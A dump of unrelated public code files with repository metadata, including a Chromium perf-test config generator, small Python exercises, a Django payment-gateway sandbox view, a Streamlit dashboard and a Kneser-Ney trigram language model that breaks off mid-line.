'name': 'cc_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Android Galaxy S5 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Android Nexus5 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus6 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus7v2 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus9 Perf',\n 'shards': [2]\n },\n 
],\n 'chromium.perf.fyi': [\n {\n 'name': 'Android Galaxy S5 Perf',\n 'shards': [1]\n },\n ]\n }\n },\n {\n 'args': [\n 'cc_perftests',\n '--test-launcher-print-test-stdio=always'\n ],\n 'name': 'cc_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Linux Perf',\n 'shards': [3]\n },\n ]\n }\n },\n {\n 'args': [\n 'tracing_perftests',\n '--test-launcher-print-test-stdio=always'\n ],\n 'name': 'tracing_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Linux Perf',\n 'shards': [3]\n },\n ]\n }\n },\n {\n 'args': [\n 'load_library_perf_tests',\n '--test-launcher-print-test-stdio=always'\n ],\n 'name': 'load_library_perf_tests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Linux Perf',\n 'shards': [3]\n },\n {\n 'name': 'Win 7 ATI GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Nvidia GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Win 7 x64 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 8 Perf',\n 'shards': [2]\n },\n ]\n }\n },\n {\n 'args': [\n 'performance_browser_tests',\n '--test-launcher-print-test-stdio=always',\n '--gtest_filter=TabCapturePerformanceTest.*:CastV2PerformanceTest.*',\n '--test-launcher-jobs=1',\n '--enable-gpu'\n ],\n 'name': 'performance_browser_tests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Mac 10.8 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Mac 10.9 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Win 7 ATI GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Nvidia GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Win 7 x64 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 8 Perf',\n 'shards': [2]\n },\n ]\n }\n },\n {\n 'args': [\n 'angle_perftests',\n '--test-launcher-print-test-stdio=always',\n '--test-launcher-jobs=1'\n ],\n 'name': 'angle_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Win 7 ATI GPU Perf',\n 'shards': [2]\n },\n {\n 'name': 'Win 7 Nvidia GPU Perf',\n 'shards': [2]\n },\n ]\n }\n },\n]\n\ndef add_tester(waterfall, name, perf_id, platform, target_bits=64,\n num_host_shards=1, num_device_shards=1, swarming=None):\n del perf_id # this will be needed\n waterfall['testers'][name] = {\n 'platform': platform,\n 'num_device_shards': num_device_shards,\n 'num_host_shards': num_host_shards,\n 'target_bits': target_bits,\n }\n\n if swarming:\n waterfall['testers'][name]['swarming_dimensions'] = swarming\n waterfall['testers'][name]['swarming'] = True\n\n return waterfall\n\ndef get_fyi_waterfall_config():\n waterfall = {'builders':[], 'testers': {}}\n waterfall = add_tester(\n waterfall, 'Android Galaxy S5 Perf',\n 'android-galaxy-s5-perf', 'android')\n waterfall = add_tester(\n waterfall, 'Win 10 Low-End Perf Tests',\n 'win-low-end-2-core', 'win',\n swarming=[\n {\n 'gpu': '1002:9874',\n 'os': 'Windows-10-10586',\n 'device_ids': ['build171-b4', 'build186-b4']\n }\n ])\n return waterfall\n\ndef get_waterfall_config():\n waterfall = {'builders':[], 'testers': {}}\n\n # These configurations are taken from chromium_perf.py in\n # build/scripts/slave/recipe_modules/chromium_tests and must be kept in sync\n # to generate the correct json for each tester\n waterfall = add_tester(\n waterfall, 'Android Galaxy S5 Perf',\n 'android-galaxy-s5', 'android', target_bits=32,\n num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 
'Android Nexus5 Perf', 'android-nexus5',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus5X Perf', 'android-nexus5X',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus6 Perf', 'android-nexus6',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus7v2 Perf', 'android-nexus7v2',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android Nexus9 Perf', 'android-nexus9',\n 'android', num_device_shards=7, num_host_shards=3)\n waterfall = add_tester(\n waterfall, 'Android One Perf', 'android-one',\n 'android', target_bits=32, num_device_shards=7, num_host_shards=3)\n\n waterfall = add_tester(\n waterfall, 'Win Zenbook Perf', 'win-zenbook', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 10 Perf', 'chromium-rel-win10', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 8 Perf', 'chromium-rel-win8-dual', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 Perf', 'chromium-rel-win7-dual',\n 'win', target_bits=32, num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 x64 Perf',\n 'chromium-rel-win7-x64-dual', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 ATI GPU Perf',\n 'chromium-rel-win7-gpu-ati', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 Intel GPU Perf',\n 'chromium-rel-win7-gpu-intel', 'win', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Win 7 Nvidia GPU Perf',\n 'chromium-rel-win7-gpu-nvidia', 'win', num_host_shards=5)\n\n waterfall = add_tester(\n waterfall, 'Mac 10.11 Perf', 'chromium-rel-mac11',\n 'mac', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Mac 10.10 Perf', 'chromium-rel-mac10',\n 'mac', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Mac Retina Perf',\n 'chromium-rel-mac-retina', 'mac', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Mac HDD Perf', 'chromium-rel-mac-hdd', 'mac', num_host_shards=5)\n waterfall = add_tester(\n waterfall, 'Mac Pro 10.11 Perf',\n 'chromium-rel-mac11-pro', 'mac',\n swarming=[\n {\n 'gpu': '1002:6821',\n 'os': 'Mac-10.11',\n 'device_ids': [\n 'build128-b1', 'build129-b1',\n 'build130-b1', 'build131-b1', 'build132-b1'\n ]\n }\n ])\n waterfall = add_tester(\n waterfall, 'Mac Air 10.11 Perf',\n 'chromium-rel-mac11-air', 'mac',\n swarming=[\n {\n 'gpu': '8086:1626',\n 'os': 'Mac-10.11',\n 'device_ids': [\n 'build123-b1', 'build124-b1',\n 'build125-b1', 'build126-b1', 'build127-b1'\n ]\n }\n ])\n\n waterfall = add_tester(\n waterfall, 'Linux Perf', 'linux-release', 'linux', num_host_shards=5)\n\n return waterfall\n\ndef generate_telemetry_test(swarming_dimensions, benchmark_name, browser):\n # The step name must end in 'test' or 'tests' in order for the\n # results to automatically show up on the flakiness dashboard.\n # (At least, this was true some time ago.) 
Continue to use this\n # naming convention for the time being to minimize changes.\n\n test_args = [\n benchmark_name,\n '-v',\n '--upload-results',\n '--output-format=chartjson',\n '--browser=%s' % browser\n ]\n # When this is enabled on more than just windows machines we will need\n # --device=android\n\n step_name = benchmark_name\n if browser == 'reference':\n test_args.append('--output-trace-tag=_ref')\n step_name += '.reference'\n\n swarming = None\n if swarming_dimensions:\n swarming = {\n # Always say this is true regardless of whether the tester\n # supports swarming. It doesn't hurt.\n 'can_use_on_swarming_builders': True,\n 'expiration': 14400,\n 'dimension_sets': swarming_dimensions\n }\n\n result = {\n 'args': test_args,\n 'isolate_name': 'telemetry_perf_tests',\n 'name': step_name,\n 'override_compile_targets': ['telemetry_perf_tests'],\n }\n if swarming:\n result['swarming'] = swarming\n\n return result\n\ndef script_test_enabled_on_tester(master, test, tester_name, shard):\n for enabled_tester in test['testers'].get(master, []):\n if enabled_tester['name'] == tester_name:\n if shard in enabled_tester['shards']:\n return True\n return False\n\ndef generate_script_tests(master, tester_name, shard):\n script_tests = []\n for test in SCRIPT_TESTS:\n if script_test_enabled_on_tester(master, test, tester_name, shard):\n script = {\n 'args': test['args'],\n 'name': test['name'],\n 'script': test['script']\n }\n script_tests.append(script)\n return script_tests\n\ndef generate_telemetry_tests(tester_config, benchmarks):\n isolated_scripts = []\n # First determine the browser that you need based on the tester\n browser_name = ''\n if tester_config['platform'] == 'android':\n browser_name = 'android-chromium'\n elif (tester_config['platform'] == 'win'\n and tester_config['target_bits'] == 64):\n browser_name = 'release_x64'\n else:\n browser_name ='release'\n\n for benchmark in benchmarks:\n # First figure out swarming dimensions this test needs to be triggered on.\n # For each set of dimensions it is only triggered on one of the devices\n swarming_dimensions = []\n for dimension in tester_config['swarming_dimensions']:\n device_affinity = bot_utils.GetDeviceAffinity(\n len(dimension['device_ids']), benchmark.Name())\n\n device_id = dimension['device_ids'][device_affinity]\n # Id is unique within the swarming pool so it is the only needed\n # identifier for the bot to run the test on\n swarming_dimensions.append({\n 'id': device_id,\n 'gpu': dimension['gpu'],\n 'os': dimension['os'],\n 'pool': 'Chrome-perf',\n })\n\n test = generate_telemetry_test(\n swarming_dimensions, benchmark.Name(), browser_name)\n isolated_scripts.append(test)\n # Now create another executable for this benchmark on the reference browser\n reference_test = generate_telemetry_test(\n swarming_dimensions, benchmark.Name(),'reference')\n isolated_scripts.append(reference_test)\n\n return isolated_scripts\n\n\nBENCHMARK_NAME_WHITELIST = set([\n u'smoothness.top_25_smooth',\n u'sunspider',\n u'system_health.webview_startup',\n u'page_cycler_v2.intl_hi_ru',\n u'dromaeo.cssqueryjquery',\n])\n\n# List of benchmarks that are to never be run on a waterfall.\nBENCHMARK_NAME_BLACKLIST = [\n 'multipage_skpicture_printer',\n 'multipage_skpicture_printer_ct',\n 'rasterize_and_record_micro_ct',\n 'repaint_ct',\n 'multipage_skpicture_printer',\n 'multipage_skpicture_printer_ct',\n 'skpicture_printer',\n 'skpicture_printer_ct',\n]\n\ndef current_benchmarks(use_whitelist):\n current_dir = os.path.dirname(__file__)\n 
benchmarks_dir = os.path.join(current_dir, 'benchmarks')\n top_level_dir = os.path.dirname(benchmarks_dir)\n\n all_benchmarks = discover.DiscoverClasses(\n benchmarks_dir, top_level_dir, benchmark_module.Benchmark,\n index_by_class_name=True).values()\n # Remove all blacklisted benchmarks\n for blacklisted in BENCHMARK_NAME_BLACKLIST:\n for benchmark in all_benchmarks:\n if benchmark.Name() == blacklisted:\n all_benchmarks.remove(benchmark)\n break\n\n if use_whitelist:\n all_benchmarks = (\n bench for bench in all_benchmarks\n if bench.Name() in BENCHMARK_NAME_WHITELIST)\n return sorted(all_benchmarks, key=lambda b: b.Name())\n\n\ndef generate_all_tests(waterfall, use_whitelist):\n tests = {}\n for builder in waterfall['builders']:\n tests[builder] = {}\n all_benchmarks = current_benchmarks(use_whitelist)\n\n for name, config in waterfall['testers'].iteritems():\n if config.get('swarming', False):\n # Right now we are only generating benchmarks for the fyi waterfall\n isolated_scripts = generate_telemetry_tests(config, all_benchmarks)\n tests[name] = {\n 'isolated_scripts': sorted(isolated_scripts, key=lambda x: x['name'])\n }\n else:\n # scripts are only currently run in addition to the main waterfall. They\n # are currently the only thing generated in the perf json file.\n # TODO eyaich: will need to handle the sharding differently when we have\n # swarmed bots on the main waterfall.\n for shard in range(0, config['num_host_shards']):\n tester_name = '%s (%d)' % (name, shard + 1)\n scripts = generate_script_tests(waterfall['name'], name, shard + 1)\n if scripts:\n tests[tester_name] = {\n 'scripts': sorted(scripts, key=lambda x: x['name'])\n }\n\n tests['AAAAA1 AUTOGENERATED FILE DO NOT EDIT'] = {}\n tests['AAAAA2 See //tools/perf/generate_perf_json.py to make changes'] = {}\n filename = '%s.json' % waterfall['name']\n\n current_dir = os.path.dirname(os.path.abspath(__file__))\n src_dir = os.path.dirname(os.path.dirname(current_dir))\n\n with open(os.path.join(src_dir, 'testing', 'buildbot', filename), 'w') as fp:\n json.dump(tests, fp, indent=2, separators=(',', ': '), sort_keys=True)\n fp.write('\\n')\n\n\ndef main():\n waterfall = get_waterfall_config()\n waterfall['name'] = 'chromium.perf'\n fyi_waterfall = get_fyi_waterfall_config()\n fyi_waterfall['name'] = 'chromium.perf.fyi'\n\n generate_all_tests(fyi_waterfall, True)\n generate_all_tests(waterfall, False)\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"briantruong777/quic-inverse-multiplex","sub_path":"src/tools/perf/generate_perf_json.py","file_name":"generate_perf_json.py","file_ext":"py","file_size_in_byte":15557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18908762264","text":"import re\na = input()\nls = a.split(\"_\")\nprint(ls[0] + \"\".join(ls[i].capitalize() for i in range(1, len(ls))))\n\n# camel = \"\"\n# i = 0\n# while (i!=len(a)):\n# if (a[i]==\"_\"):\n# camel += a[i] + a[i+1].upper()\n# i+=2\n# else:\n# camel += a[i]\n# i += 1\n\n# print (re.sub(\"_\", \"\", camel))\n# print(a.split(\"_\"))\n","repo_name":"Aminochka4/pp2","sub_path":"lab 5/RegEx/A7.py","file_name":"A7.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39659007930","text":"import unittest\nfrom typing import List\nfrom pprint import pprint\nimport math\n\nclass Solution1:\n def furthestBuilding(self, heights: List[int], bricks: int, ladders: int) -> 
int:\n # LTE - O(len(heights)*ladders)\n dp = [0]*(ladders+1)\n i = 0\n while i < len(heights)-1:\n h, n = heights[i], heights[i+1]\n if h < n:\n d = n-h\n nxt = [0]*(ladders+1)\n if dp[0] + d <= bricks:\n nxt[0] = dp[0] + d\n else:\n nxt[0] = math.inf\n for j in range(1, ladders+1):\n if dp[j] + d <= bricks:\n nxt[j] = min(dp[j-1], dp[j]+d) \n else:\n nxt[j] = dp[j-1]\n if not any(l < math.inf for l in nxt):\n break\n dp = nxt\n i += 1\n return i\n\nimport heapq\nclass Solution:\n def furthestBuilding(self, heights: List[int], bricks: int, ladders: int) -> int:\n L = len(heights)\n res = 0\n h = []\n while res < L-1:\n hi, hn = heights[res], heights[res+1]\n diff = hn - hi\n if diff > 0:\n heapq.heappush(h, -diff)\n bricks -= diff\n if bricks < 0:\n if ladders == 0:\n return res\n else:\n ladders -= 1\n bricks -= heapq.heappop(h)\n res += 1\n return res\n\nclass TestSolution(unittest.TestCase):\n\n def test_case_1(self):\n sol = Solution()\n heights = [4,2,7,6,9,14,12]\n bricks = 5\n ladders = 1\n expected = 4\n self.assertEqual(sol.furthestBuilding(heights, bricks, ladders), expected)\n\n def test_case_2(self):\n sol = Solution()\n heights = [4,12,2,7,3,18,20,3,19]\n bricks = 10\n ladders = 2\n expected = 7\n self.assertEqual(sol.furthestBuilding(heights, bricks, ladders), expected)\n \n # def test_edge_case_1(self):\n # sol = Solution()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EdisonChendi/leetcodeshuashuashua","sub_path":"meiriyiti/us/1642_furthest_building_you_can_reach.py","file_name":"1642_furthest_building_you_can_reach.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4408865884","text":"#display as per level order\nfrom typing import Counter\n\n\ndef DisplayTree(rootNode):\n if rootNode is None:\n return\n que = []\n que.append(rootNode)\n while len(que) != 0 :\n currentRoot = que.pop(0)\n print(currentRoot.data)\n if currentRoot.left is not None:\n que.append(currentRoot.left)\n if currentRoot.right is not None:\n que.append(currentRoot.right)\n\n\n\nclass BinaryTree:\n def __init__(self,data):\n self.left = None\n self.data = data\n self.right = None\n \ndef insert(rootNode, newNode):\n if not rootNode:\n rootNode = newNode\n else:\n customQueue = []\n customQueue.append(rootNode)\n while len(customQueue) != 0:\n root = customQueue.pop(0)\n if root.left is not None:\n customQueue.append(root.left)\n else:\n root.left = newNode\n return \"Successfully Inserted\"\n if root.right is not None:\n customQueue.append(root.right)\n else:\n root.right= newNode\n return \"Successfully Inserted\"\n\nroot = BinaryTree(\"A\")\ninsert(root,BinaryTree(\"B\"))\ninsert(root,BinaryTree(\"C\"))\ninsert(root,BinaryTree(\"D\"))\ninsert(root,BinaryTree(\"E\"))\ninsert(root,BinaryTree(\"F\"))\ninsert(root,BinaryTree(\"G\"))\n# DisplayTree(root)\n\nprint(root.data)\nprint(root.left.data,\"\\t\",root.right.data)\nprint(root.left.left.data,root.left.right.data,end=\"\")\nprint(\"\\t\",root.right.left.data,root.right.right.data)","repo_name":"Rakeshyakkundi/DSA","sub_path":"BinaryTreeInsertion.py","file_name":"BinaryTreeInsertion.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36921341205","text":"\"\"\"config URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom pprint import pprint\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom sslcommerz_lib import SSLCOMMERZ\nssl_settings = {\n 'store_id': 'yourstoreid',\n 'store_pass': 'yourstorepassword',\n 'issandbox': True\n}\n\n\ndef pay_wit_ssl_commerz(request):\n sslcommerz = SSLCOMMERZ(ssl_settings)\n\n post_body = {}\n post_body['total_amount'] = 100.26\n post_body['currency'] = \"BDT\"\n post_body['tran_id'] = \"12345\"\n post_body['success_url'] = \"https://tareqmonwer.com\"\n post_body['fail_url'] = \"www.erpbud.com/blog/\"\n post_body['cancel_url'] = \"www.erpbud.com\"\n post_body['emi_option'] = 0\n post_body['cus_name'] = \"test\"\n post_body['cus_email'] = \"test@test.com\"\n post_body['cus_phone'] = \"01700000000\"\n post_body['cus_add1'] = \"customer address\"\n post_body['cus_city'] = \"Dhaka\"\n post_body['cus_country'] = \"Bangladesh\"\n post_body['shipping_method'] = \"NO\"\n post_body['num_of_item'] = 1\n post_body['product_name'] = \"Test\"\n post_body['product_category'] = \"Test Category\"\n post_body['product_profile'] = \"general\"\n\n response = sslcommerz.createSession(post_body)\n pprint(response)\n\n if response['status'] == 'SUCCESS':\n return HttpResponseRedirect(response['GatewayPageURL'])\n return HttpResponse(response)\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('pay', pay_wit_ssl_commerz, name='payment'),\n]\n","repo_name":"TareqMonwer/Django-SSL-Commerz-Integ","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"10724482921","text":"# streamlit run .\\Desktop\\python_tests\\streamlit_web_app.py\r\n\r\nimport streamlit as st\r\nimport time\r\nimport requests\r\nimport json\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport plost\r\nfrom PIL import Image\r\n\r\n# ------------------------------ Page setting ------------------------------\r\nst.set_page_config( page_title = \"THE F.I.R.S.T\",\r\n\t\t\t\t\tlayout = \"wide\")\r\nst.title(\"--- Ground Control Station ---\")\r\nst.markdown(\"#\")\r\n\r\n# ------------------------------ Initialization ------------------------------\r\n\r\n# ------- Variables -------\r\nusv_data = 0\r\nprint_data = 0\r\n\r\ncontrol_panel_header = st.empty()\r\ndisplay_header = st.empty()\r\ncontrol_board = st.empty()\r\ndisplay_section = st.empty()\r\n\r\nmode = \"\"\r\nlat = 0\r\nlng = 0\r\n\r\n# ------------------------------ Interactive content ------------------------------\r\nwith control_panel_header:\r\n\tst.header(\"Control panel\")\r\n# ---------------- Control board ----------------\r\ncontrol_board.empty()\r\nwith control_board.container():\r\n\tmode = st.selectbox('Mode',('Waypoints','Zigzac path'), key=1)\r\n\tst.write('Selected mode: ', mode)\r\n\tlat = st.number_input('Waypoint latitude', key=2)\r\n\tst.write('Selected latitude: ', 
lat)\r\n\tlng = st.number_input('Waypoint longitude', key=3)\r\n\tst.write('Selected longitude: ', lng)\r\n\r\n\r\n\r\n# ---------------------------------------- WHILE LOOP ----------------------------------------\r\n# ----------------------------------------............----------------------------------------\r\nwhile True:\r\n\r\n\t# ----------------------------- Data requests -----------------------------\r\n\trep_obj = requests.get(\"http://127.0.0.1:8000/get_data/motor\")\r\n\trep_content = rep_obj.json()[0]\r\n\trep_text = json.dumps(rep_content) \r\n\r\n\t# ----------------------------- Data manipulation -----------------------------\r\n\tprint(rep_text)\r\n\tusv_data = int(rep_text)\r\n\tprint_data = usv_data * 2 \r\n\r\n\t# ------------------------------ Read-only content ------------------------------\r\n\twith display_header:\r\n\t\tst.header(\"USV's Data\")\r\n\r\n\t# ---------------- USV's states ----------------\r\n\tdisplay_section.empty()\r\n\twith display_section.container():\r\n\t\tst.subheader(\"Motor 1 = {}\".format(print_data))\r\n\r\n","repo_name":"6038-in-Git/usv_ground_station","sub_path":"streamlit_web_app.py","file_name":"streamlit_web_app.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20762312068","text":"print('n = ', end = '')\ntry:\n\tn = int(input())\nexcept:\n\t\tn = 100\nif n < 1:\n\tn = 100\nprint('')\nfor i in range(n):\n\tif (i+1)%15 == 0:\n\t\tprint('Fizz Buzz')\n\telif (i+1)%5 == 0:\n\t\tprint('Buzz')\n\telif (i+1)%3 == 0:\n\t\tprint('Fizz')\n\telse:\n\t\tprint(i+1)\nprint('')","repo_name":"Astro1123/practice","sub_path":"FizzBuzz/Python3/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74810241495","text":"#coding:utf-8 \nfrom django.contrib import admin\n\n# Register your models here.\nfrom myapp.models import AliOrd, AliConfig, Agent, PayResult\n\n# Add in this class to customized the Admin Interface\nclass AliOrdAdmin(admin.ModelAdmin):\n list_display = ('CommId', 'CommPrice', 'PayAmount','SettleDate','RebateAmt','OrderId','PosName','UplineName','Up2lineName',)\n\nclass AliConfigAdmin(admin.ModelAdmin):\n list_display = ('GroupId', 'AgentId', 'AgentUpId', 'ZhaohuoPid', 'AppPid', 'AgentPerc', 'Agent2rdPerc', 'Agent3rdPerc',)\n\nclass AgentAdmin(admin.ModelAdmin):\n list_display = ('AgentName', 'AgentId',)\n\nclass PayResultAdmin(admin.ModelAdmin):\n list_display = ('GroupId', 'AgentName', 'AgentId', 'AgentUpName', 'AgentUpId', 'ZhaohuoPid', 'AppPid', 'AgentPerc', 'Agent2rdPerc', 'Agent3rdPerc',\n 'IncomeSelf', 'IncomeLv1', 'IncomeLv2', 'IncomeTotal', 'CalculateStatus', 'CalculateYear', 'CalculateMonth', 'PayAccount', 'PayStatus',)\n\nadmin.site.register(AliOrd, AliOrdAdmin)\nadmin.site.register(AliConfig, AliConfigAdmin)\nadmin.site.register(Agent, AgentAdmin)\nadmin.site.register(PayResult, PayResultAdmin)","repo_name":"georgesze/mysite4","sub_path":"myapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19698855696","text":"from imageai.Detection import ObjectDetection\nimport os\n\nexec_path = os.getcwd()\nprint(exec_path)\ndetector = ObjectDetection()\ndetector.setModelTypeAsRetinaNet()\ndetector.setModelPath(os.path.join(\n exec_path, 
\"resnet50_coco_best_v2.0.1.h5\")\n)\ndetector.loadModel()\nlist = detector.detectObjectsFromImage(\n input_image = os.path.join(exec_path, \"people.jpg\"),\n output_image_path = os.path.join(exec_path, \"new_people.jpg\"),\n minimum_percentage_probability = 30,\n display_percentage_probability = False,\n display_object_name = True\n)","repo_name":"zvrv-dasha/kpfu-homeworks","sub_path":"image-ai-detecting-objects-photo/ImageAI_photo.py","file_name":"ImageAI_photo.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15281539317","text":"from pydantic import BaseSettings, Field\n\n\nclass Settings(BaseSettings):\n CORS_ORIGINS: list[str] = Field(\n default=[\"*\"],\n env=\"CORS_ORIGINS\",\n description=\"A list of origins that should be allowed to make cross-origin requests.\",\n )\n HOST: str = Field(default=\"0.0.0.0\", env=\"HOST\")\n PORT: int = Field(default=8000, env=\"PORT\")\n GOOGLE_APPLICATION_CREDENTIALS: str | None = Field(\n default=None, env=\"GOOGLE_APPLICATION_CREDENTIALS\")\n GOOGLE_APPLICATION_CREDENTIALS_FILE_PATH: str | None = Field(\n default=None, env=\"GOOGLE_APPLICATION_CREDENTIALS_FILE_PATH\"\n )\n GUEST_SPREADSHEET_ID: str | None = Field(\n env=\"GUEST_SPREADSHEET_ID\"\n )\n LOG_LEVEL: str = Field(default=\"INFO\", env=\"LOG_LEVEL\")\n REPOSITORY_TYPE: str = Field(\n default=\"sqlite\",\n env=\"REPOSITORY_TYPE\",\n description=\"The type of repository to use. Can be 'sqlite' or 'gsheets'.\",\n )\n SQLITE_DATABASE_PATH: str = Field(\n default=\"sqlite:///./data.db\",\n env=\"SQLITE_DATABASE_PATH\",\n description=\"The path to the SQLite database file.\",\n )\n\n class Config:\n env_file = \".env\"\n env_file_encoding = \"utf-8\"\n","repo_name":"kttur/karim-vika-wedding-back","sub_path":"src/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73795277976","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom collections import defaultdict\nimport numpy as np\nfrom ngram_lm import BaseLM \n\nclass KNTrigramLM(BaseLM):\n \"\"\"Trigram LM with Kneser-Ney smoothing.\"\"\"\n order_n = 3\n # For testing - do not modify.\n state_vars = ['delta', 'counts', 'type_contexts',\n 'context_totals', 'context_nnz', 'type_fertility',\n 'z_tf', 'words']\n\n def __init__(self, tokens):\n \"\"\"Build our smoothed trigram model.\n\n This should be similar to the AddKTrigramLM.__init__ function, above,\n but will compute a number of additional quantities that we need for the\n more sophisticated KN model.\n\n See the documentation in the notebook for the KN backoff model\n definition and equations, and be sure to read the in-line comments\n carefully to understand what each data structure represents.\n\n Note the usual identification of variables:\n w : c : current word\n w_1 : w_{i-1} : b : previous word\n w_2 : w_{i-2} : a : previous-previous word\n\n There are two blocks of code to fill here. 
In the first one, you should\n fill in the inner loop to compute:\n self.counts (unigram, bigram, and trigram)\n self.type_contexts (set of preceding words for each word (type))\n\n In the second one, you should compute:\n self.context_totals (as in AddKTrigramLM)\n self.context_nnz (number of nonzero elements for each context)\n self.type_fertility (number of unique preceding words for each word\n (type))\n\n The starter code will fill in:\n self.z_tf (normalization constant for type fertilities)\n self.words (list of words known to the model)\n\n Args:\n tokens: (list or np.array) of training tokens\n\n Returns:\n None\n \"\"\"\n self.delta = 0.75\n # Raw counts over the corpus.\n # Keys are context (N-1)-grams, values are dicts of word -> count.\n # You can access C(w | w_{i-1}, ...) as:\n # unigram: self.counts[()][w]\n # bigram: self.counts[(w_1,)][w]\n # trigram: self.counts[(w_2,w_1)][w]\n self.counts = defaultdict(lambda: defaultdict(lambda: 0))\n # As in AddKTrigramLM, but also store the unigram and bigram counts\n # self.context_totals[()] = (total word count)\n # self.context_totals[(w_1,)] = c(w_1)\n # self.context_totals[(w_2, w_1)] = c(w_2, w_1)\n self.context_totals = dict()\n # Also store in self.context_nnz the number of nonzero entries for each\n # context; as long as \\delta < 1 this is equal to nnz(context) as\n # defined in the notebook.\n self.context_nnz = dict()\n\n # Context types: store the set of preceding words for each word\n # map word -> {preceding_types}\n self.type_contexts = defaultdict(lambda: set())\n # Type fertility is the size of the set above\n # map word -> |preceding_types|\n self.type_fertility = dict()\n # z_tf is the sum of type fertilities\n self.z_tf = 0.0\n\n\n # Iterate through the word stream once\n # Compute unigram, bigram, trigram counts and type fertilities\n w_1, w_2 = None, None\n for word in tokens:\n self.counts[()][word] += 1\n if w_1 is not None:\n self.counts[(w_1,)][word] += 1\n self.type_contexts[word].add(w_1)\n if w_2 is not None:\n self.counts[(w_2,w_1)][word] += 1\n\n # Update context\n w_2 = w_1\n w_1 = word\n\n ##\n # We'll compute type fertilities and normalization constants now,\n # but not actually store the normalized probabilities. That way, we can compute\n # them (efficiently) on the fly.\n\n # Count the total for each context.\n self.context_totals = {k:float(sum(c.values())) for k,c in self.counts.items()}\n\n # Count the number of nonzero entries for each context.\n self.context_nnz = {k:len(c) 